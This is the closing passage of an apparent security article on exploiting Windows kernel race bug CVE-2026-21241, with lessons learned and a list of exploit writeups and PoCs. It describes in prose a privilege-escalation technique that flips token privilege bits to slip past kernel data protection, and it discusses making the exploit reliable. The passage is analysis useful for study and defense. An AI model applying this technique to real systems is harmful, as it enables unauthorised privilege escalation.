_EPROCESS.Tokenoverwrite — the ThrottleStop endgame — is guarded data now. The token'sPrivilegesbitmasks are not. Flipping bit 20 in two ULONGs achieves the identical outcome with writes no KDP entry covers. Every data-only hardening decision answers the question "which data remains writable" — and the token's interior is still on that list. -
Races are reliability problems, not capability problems.
AC:Hin the CVSS vector is real — five wins, minutes each, with a BSOD riding every loss. But the mitigations priced into this exploit cost it retries, never reachability. Reliability engineering (better spray timing, a stable r/w primitive instead of five flips) converts this from a weekend demonstration into a weapon; nothing in the defense stack prevents that conversion. -
The fix to a lifetime bug is the lifetime. Microsoft's patch did not shrink the race window or sanitize
NotifyStatus— it removed the free from the concurrent path entirely and refcounted the object so the last reference does the freeing. That is the template: when the invariant "never free what is still referenced" is violated, no amount of window-narrowing restores it.
Further reading:
- Souhail Hammou's original writeup — the discovery, the mini-completion-packet background, and the minimal crash PoC
- jle-k's "Exploiting CVE-2026-21241" — the full weaponization this article walks through; the primary source for every exploitation stage
- Bad_Jubies' reversing analysis — patch diffing via WinBindex/BinDiff, and the clearest account of the spinlock timeline
- Souhail's PoC and Bad_Jubies' PoC — both crash triggers, two different race strategies
- MSRC advisory — CVE-2026-21241 — affected builds and KB numbers
- carrot_c4k3's Pwn2Own 2024 writeup — the
SepMediumDaclSdcorruption technique this chain borrows (also covered in the CVE-2024-30088 article) - angelboy's Devcore post — the original
Rtlbitmap-as-primitive privilege manipulation this chain descends from - Yarden Shafir's I/O Ring read/write primitive — the more reliable endgame jle-k recommends in hindsight
- Windows Internals, Part 2 (Russinovich, Solomon, Ionescu, Yosifovich) — I/O completion and the pool
- The companion defense post and The Kernel Attack Surface for the full series context